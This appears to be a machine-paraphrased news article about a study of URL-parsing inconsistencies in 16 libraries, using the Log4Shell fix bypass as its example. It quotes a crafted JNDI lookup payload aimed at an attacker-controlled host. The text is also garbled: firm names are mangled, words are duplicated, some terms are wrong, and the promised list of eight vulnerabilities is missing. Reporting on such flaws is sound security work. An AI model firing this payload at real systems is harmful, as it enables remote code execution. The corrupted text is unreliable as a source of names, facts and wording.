A study of 16 different uniform resource locators (URL) parsing library found inconsistencies and confusion that can be exploited to bypass validation and open the door to various attack vectors.
In an in-depth analysis jointly conducted by cybersecurity firms Clarotti Like Synk, eight security vulnerabilities were found in many third-party libraries written in C, JavaScript, PHP, Python, and Ruby languages and used by multiple web applications.
“Confusion in URL parsing could lead to unexpected behavior of software, such as web applications, and could be exploited by threat actors to cause denial of service conditions, information disclosure, or possible remote code execution attacks,” the researchers said. said in a report shared by Hacker News.
Because URLs are an underlying mechanism by which resources located locally or on the Web can be requested and retrieved, differences in how a parsing library interprets URL requests can pose significant risks to users.
A prime example is the critical Log4Shell vulnerability disclosed last month in the ubiquitous Log4j logging framework, which stems from the fact that a malicious attacker-controlled string is evaluated as logged by a vulnerable application. will result in JNDI Connect to an attacker-operated server and perform a lookup of arbitrary Java code.
Although the Apache Software Foundation (ASF) quickly patched the vulnerability, it was quickly discovered that the mitigation could be bypassed with a specially crafted input in the format “${jndi:ldap://127.0.0″[.]1#.evilhost.com:1389/a}” again allows remote JNDI lookups for code execution.
“This bypass stems from the fact that two different (!) URL parsers are used during the JNDI lookup process, one to validate the URL and one to fetch it, depending on each There has also been a change in how the browser handles fragment part (#) URLs,” the researchers said.
Specifically, if the input is treated as a regular HTTP URL, then authority The component – the combination of the domain name and port number – ends when a fragment identifier is encountered, and when treated as an LDAP URL, the resolver assigns the entire “127.0.0[.]1#.evilhost.com:1389” as authoritative because the LDP URL specification does not consider this fragment.
In fact, the use of multiple parsers was one of the two main reasons for the discovery of these eight vulnerabilities, the other being an inconsistency in libraries following different URL specifications, effectively introducing exploitable vulnerabilities.
Discord ranges from obfuscation involving URLs containing backslashes (“”), irregular numbers of slashes (for example, https:///www.example[.]com), or URL encoded data (“%”) to a URL that lacks a URL scheme and can be exploited to gain remote code execution or even stage denial of service (DoS) and open redirect phishing attacks.
The list of eight vulnerabilities discovered is as follows, all of which have been addressed by their respective maintainers –
“Many real-life attack scenarios may arise from different parsing primitives,” the researchers said.To protect applications from URL parsing vulnerabilities, “it is necessary to have a good understanding of which parsers are involved in the process [and] Differences between parsers, including their leniency, how they interpret different malformed URLs, and what types of URLs they support. “
